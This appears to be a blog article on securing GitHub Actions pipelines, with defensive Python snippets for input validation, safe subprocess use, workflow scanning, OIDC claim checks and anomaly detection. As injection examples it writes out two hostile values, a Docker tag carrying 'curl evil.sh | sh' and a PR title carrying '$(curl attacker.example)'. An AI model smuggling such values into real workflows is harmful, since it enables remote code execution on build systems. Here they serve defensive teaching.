CI/CD security: How to secure your GitHub ecosystem
GitHub Actions has become infrastructure, and like all infrastructure, it needs a threat model. Most teams approach CI/CD security reactively—patching after incidents or applying generic hardening checklists. Detection-based threat modeling flips this: you map your actual attack surface first, then build detections and controls around the paths that matter.
Start with inputs. Every workflow trigger is an attack vector. Pull request events are the obvious one—an external contributor opens a PR that triggers a workflow with access to secrets. But workflow_dispatch with user-supplied inputs is equally dangerous. I've seen teams allow arbitrary Docker image tags as inputs, essentially handing attackers a command injection primitive. The same applies to issue comments that trigger workflows, repository_dispatch events, and even schedule triggers if an attacker can modify the cron expression through a previous compromise.
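One concrete defense is to validate dispatch inputs against a strict pattern before they reach any shell. A minimal sketch in Python—the tag policy here is a hypothetical example; an explicit allowlist of known-good tags is stricter still:

```python
import re

def validate_image_tag(tag: str) -> str:
    """Reject any workflow_dispatch input that could smuggle shell syntax.

    Allows only characters legal in a Docker tag (letters, digits, and
    a few separators), so metacharacters like ; | $( ) never survive.
    """
    if not re.fullmatch(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}", tag):
        raise ValueError(f"rejected image tag: {tag!r}")
    return tag
```

A tag like `v1.2.3` passes; `latest; curl evil.sh | sh` raises before it can reach a build command.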
The key is mapping which inputs flow into sensitive operations. Does a PR title get interpolated into a bash script? Does a branch name end up in a docker build command? These aren't hypothetical—script injection through unvalidated inputs remains the most common GitHub Actions vulnerability. Your threat model should explicitly document every workflow that takes external input and what that input can reach.
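GitHub's own hardening guidance for this is to pass untrusted values through an `env:` variable and reference them as quoted shell variables, rather than interpolating `${{ ... }}` directly into a `run:` script. The same principle, sketched in Python: untrusted input travels as a discrete argv element, so it is only ever data, never parsed shell text.

```python
import subprocess
import sys

def render_title(pr_title: str) -> str:
    """Hand an untrusted PR title to a child process safely.

    The title is appended as its own argv entry; no shell ever parses
    it, so `$(...)`, `;`, and backticks stay inert.
    """
    result = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])",
         pr_title],
        capture_output=True, text=True, check=True,
    )
    return result.stdout
```

A title containing `$(curl attacker.example)` comes back verbatim instead of executing—the property you lose the moment you build a command line by string interpolation.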
Identities matter more than most teams realize. The GITHUB_TOKEN has different permission scopes depending on workflow context. A workflow triggered by a pull_request event from a fork gets a read-only token by default, but pull_request_target runs in the context of the base repository with write permissions. This distinction is critical. I've audited organizations where developers used pull_request_target to access secrets for integration tests, not realizing that by also checking out and executing the PR's head code under that trigger, they had handed external contributors write access to their repository.
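A crude way to start this audit is to scan workflow files for the dangerous combination: pull_request_target paired with a checkout of the PR's head ref. A sketch—this is a text-level heuristic, not a full YAML-aware analysis, and the directory layout is the standard `.github/workflows` convention:

```python
import re
from pathlib import Path

def flag_risky_workflows(workflow_dir: str) -> list[str]:
    """Flag workflows that combine pull_request_target with a checkout
    of the PR head ref (untrusted code running with a write token)."""
    head_ref = re.compile(r"ref:\s*\$\{\{\s*github\.event\.pull_request\.head")
    risky = []
    for path in Path(workflow_dir).glob("*.y*ml"):
        text = path.read_text()
        if "pull_request_target" in text and head_ref.search(text):
            risky.append(path.name)
    return sorted(risky)
```

False negatives are possible (e.g. the head ref computed indirectly), so treat a clean scan as a starting point, not a clean bill of health.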
OIDC federation adds another identity layer. When your workflows authenticate to AWS or GCP using OIDC, the cloud provider trusts claims in the GitHub JWT. If you're not validating the sub claim properly, an attacker who compromises any workflow in your organization can assume roles meant for production deployments. Your threat model needs to map which workflows can assume which roles and what blast radius exists if a workflow is compromised.
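GitHub's sub claim encodes the repository plus a ref or environment, e.g. `repo:org/repo:ref:refs/heads/main`. A sketch of the kind of matching a cloud trust policy performs, useful for testing your conditions offline—the org, repo, and allowlist here are hypothetical:

```python
import fnmatch

# Hypothetical allowlist mirroring a cloud-side trust policy condition:
# only the main branch and the production environment of one repo may
# assume the deployment role.
ALLOWED_SUBS = [
    "repo:example-org/payments:ref:refs/heads/main",
    "repo:example-org/payments:environment:production",
]

def sub_allowed(sub_claim: str) -> bool:
    """Glob-match the GitHub OIDC `sub` claim against the allowlist,
    the way a StringLike-style trust policy condition would."""
    return any(fnmatch.fnmatch(sub_claim, p) for p in ALLOWED_SUBS)
```

Note what an overly loose pattern like `repo:example-org/*` would permit: any workflow in any repo in the org, which is exactly the blast-radius problem described above.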
Detection comes next. You can't prevent every attack, but you can detect anomalies. Monitor for workflows that suddenly start accessing new secrets, workflows that run longer than their historical baseline, or workflows that make API calls to unexpected endpoints. GitHub's audit log is underutilized here—it captures workflow runs, token usage, and permission changes. Feed this into your SIEM and alert on deviations.
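Duration baselines are an easy first detector. A minimal sketch, assuming you have already extracted per-workflow run durations from the audit log or the Actions API—the z-score threshold is a starting point, not a tuned value:

```python
from statistics import mean, stdev

def is_duration_anomaly(history: list[float], current: float,
                        z_threshold: float = 3.0) -> bool:
    """Flag a run whose duration deviates more than `z_threshold`
    standard deviations from its historical baseline.

    Real pipelines would keep separate baselines per workflow and per
    branch; this treats `history` as one homogeneous series.
    """
    if len(history) < 5:      # too little data to call anything anomalous
        return False
    mu, sigma = mean(history), stdev(history)
    if sigma == 0:
        return current != mu
    return abs(current - mu) / sigma > z_threshold
```

A workflow that historically finishes in ~5 minutes and suddenly runs for 15 (think: cryptomining or a slow exfiltration loop) trips the alert; normal jitter does not.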
Self-hosted runners deserve special attention. They're persistent compute with access to your network, often running with excessive permissions. If an attacker can get code execution in a workflow on a self-hosted runner, they've pivoted into your infrastructure. Your threat model should treat self-hosted runners as trusted network boundaries and scope their access accordingly. Use ephemeral runners when possible, and if you must use persistent ones, isolate them per team or sensitivity level.
The practical outcome of this approach is a prioritized list of detections and mitigations. Not every risk needs immediate fixing, but you should know which workflows can access production, which can exfiltrate secrets, and which can modify your supply chain. That knowledge lets you focus hardening efforts where they actually matter.